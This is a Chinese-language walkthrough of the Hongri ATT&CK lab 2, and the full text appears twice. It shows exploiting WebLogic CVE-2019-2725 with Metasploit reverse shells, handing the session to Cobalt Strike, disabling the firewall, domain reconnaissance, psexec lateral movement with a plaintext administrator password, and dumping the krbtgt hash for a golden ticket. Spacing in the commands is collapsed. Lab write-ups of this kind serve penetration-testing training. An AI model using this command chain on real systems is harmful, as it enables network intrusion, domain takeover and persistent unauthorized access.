概述首先搭建了靶场配置了网段与ip。web渗透部分通过页面发现版本为10.3.6.0并存在CVE-2019-2725漏洞用MSF模块getshell控制web主机再将msf和cs联动导入到cs中控制。在cs中进行内网渗透其中有信息收集再用cs提权再用SMB横向内网拿到域控最后再用黄金票据成功权限维持“外网突破 → 权限提升 → 横向移动 → 权限维持”涵盖了以下核心知识点WebLogic 反序列化漏洞CVE-2019-2725的利用MSF 与 CS 的联动与会话转移内网信息收集与横向移动SMB域渗透与黄金票据持久化搭建vmnet3192.168.111.0/24外网vmnet510.10.10.0/24内网DC配置 改成vmnet5内网PC配置 第一个外网vm3第二个内网vm5WEB配置 同理PC启动虚拟机我已移动网段和ip可不变开启顺序DC–PC–WEB 默认密码1qazWSX机器名称概述登录用户密码网卡详细IP网关DNSDC (win2012)DC域控delay\delay1qazWSXvmnet510.10.10.1010.10.10.1127.0.0.1PC (win7)域成员 mssql数据库delay\mssql1qazWSXvmnet510.10.10.20110.10.10.110.10.10.10vmnet3192.168.111.201192.168.111.110.10.10.10WEB (win2008)边界机器/域成员delay\weblogic1qazWSXvmnet510.10.10.8010.10.10.110.10.10.10vmnet3192.168.111.80192.168.111.110.10.10.10kali攻击者vmnet3192.168.111.11192.168.111.1-域管理员账号delay\administrator:1qazWSX启动weblogicC:\Oracle\Middleware\user_projects\domains\base_domain\bin\stratWebLogic.cmd访问web渗透通过页面发现版本为10.3.6.0此版本出现过反序列化RCE漏洞访问http://192.168.111.80:7001/_async/AsyncResponseService存在CVE-2019-2725漏洞MSF-CSmsf中搜索CVE-2019-2725进入模组setlhost192.168.111.129setrhost192.168.111.80setpayload windows/meterpreter/reverse_tcp show targets //查看类型settarget1//设为windows run我chovy 成功了用msf与cs联动cs中先创建监听 80端口 ipkali192.168.111.129再回到msf中bg//退到后台 use exploit/windows/local/payload_injectsetpayload windows/meterpreter/reverse_httpsetprependmigratetruesetDisablePayloadHandlertruesetlhost192.168.111.129setlport80setsession2run内网渗透信息收集shell netsh advfirewallsetallprofiles atate off //关防火墙 shell ipconfig /all //域信息 shell arp-a//域内ip shell net groupdomain controllers/domain //定位域管理 shellpingDC.de1ay.com //定位域控ipPC10.10.10.201DC10.10.10.10 Administrator提权内网横向端口扫描内网发现都开了445端口。可抓取hash尝试横向首先移除令牌rev2selfgetuid获得DC管理的token生成新的凭证make_token DE1AY\administrator 1qazWSX用SMB横向内网 转发上线运行jump psexec DC SMB_hongriweb22成功拿下DC域控权限维持黄金票据在控制的DC中获取domian SIDshell whoami /userSID:S-1-5-18获取hashhashdumpkrbtgt82dfc71b72a11ef37d663047bc2088fb成功了
红日靶场(ATTCK实战)2通关方法
概述首先搭建了靶场配置了网段与ip。web渗透部分通过页面发现版本为10.3.6.0并存在CVE-2019-2725漏洞用MSF模块getshell控制web主机再将msf和cs联动导入到cs中控制。在cs中进行内网渗透其中有信息收集再用cs提权再用SMB横向内网拿到域控最后再用黄金票据成功权限维持“外网突破 → 权限提升 → 横向移动 → 权限维持”涵盖了以下核心知识点WebLogic 反序列化漏洞CVE-2019-2725的利用MSF 与 CS 的联动与会话转移内网信息收集与横向移动SMB域渗透与黄金票据持久化搭建vmnet3192.168.111.0/24外网vmnet510.10.10.0/24内网DC配置 改成vmnet5内网PC配置 第一个外网vm3第二个内网vm5WEB配置 同理PC启动虚拟机我已移动网段和ip可不变开启顺序DC–PC–WEB 默认密码1qazWSX机器名称概述登录用户密码网卡详细IP网关DNSDC (win2012)DC域控delay\delay1qazWSXvmnet510.10.10.1010.10.10.1127.0.0.1PC (win7)域成员 mssql数据库delay\mssql1qazWSXvmnet510.10.10.20110.10.10.110.10.10.10vmnet3192.168.111.201192.168.111.110.10.10.10WEB (win2008)边界机器/域成员delay\weblogic1qazWSXvmnet510.10.10.8010.10.10.110.10.10.10vmnet3192.168.111.80192.168.111.110.10.10.10kali攻击者vmnet3192.168.111.11192.168.111.1-域管理员账号delay\administrator:1qazWSX启动weblogicC:\Oracle\Middleware\user_projects\domains\base_domain\bin\stratWebLogic.cmd访问web渗透通过页面发现版本为10.3.6.0此版本出现过反序列化RCE漏洞访问http://192.168.111.80:7001/_async/AsyncResponseService存在CVE-2019-2725漏洞MSF-CSmsf中搜索CVE-2019-2725进入模组setlhost192.168.111.129setrhost192.168.111.80setpayload windows/meterpreter/reverse_tcp show targets //查看类型settarget1//设为windows run我chovy 成功了用msf与cs联动cs中先创建监听 80端口 ipkali192.168.111.129再回到msf中bg//退到后台 use exploit/windows/local/payload_injectsetpayload windows/meterpreter/reverse_httpsetprependmigratetruesetDisablePayloadHandlertruesetlhost192.168.111.129setlport80setsession2run内网渗透信息收集shell netsh advfirewallsetallprofiles atate off //关防火墙 shell ipconfig /all //域信息 shell arp-a//域内ip shell net groupdomain controllers/domain //定位域管理 shellpingDC.de1ay.com //定位域控ipPC10.10.10.201DC10.10.10.10 Administrator提权内网横向端口扫描内网发现都开了445端口。可抓取hash尝试横向首先移除令牌rev2selfgetuid获得DC管理的token生成新的凭证make_token DE1AY\administrator 1qazWSX用SMB横向内网 转发上线运行jump psexec DC SMB_hongriweb22成功拿下DC域控权限维持黄金票据在控制的DC中获取domian SIDshell whoami /userSID:S-1-5-18获取hashhashdumpkrbtgt82dfc71b72a11ef37d663047bc2088fb成功了